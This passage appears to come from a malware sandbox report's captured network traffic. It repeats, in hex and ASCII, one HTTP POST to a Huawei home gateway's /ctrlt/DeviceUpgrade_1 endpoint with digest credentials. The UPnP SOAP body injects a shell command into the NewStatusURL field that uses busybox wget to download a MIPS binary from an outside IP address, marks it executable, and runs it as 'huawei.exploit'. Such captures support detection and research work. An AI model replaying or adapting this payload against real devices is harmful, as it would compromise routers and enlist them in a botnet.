75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 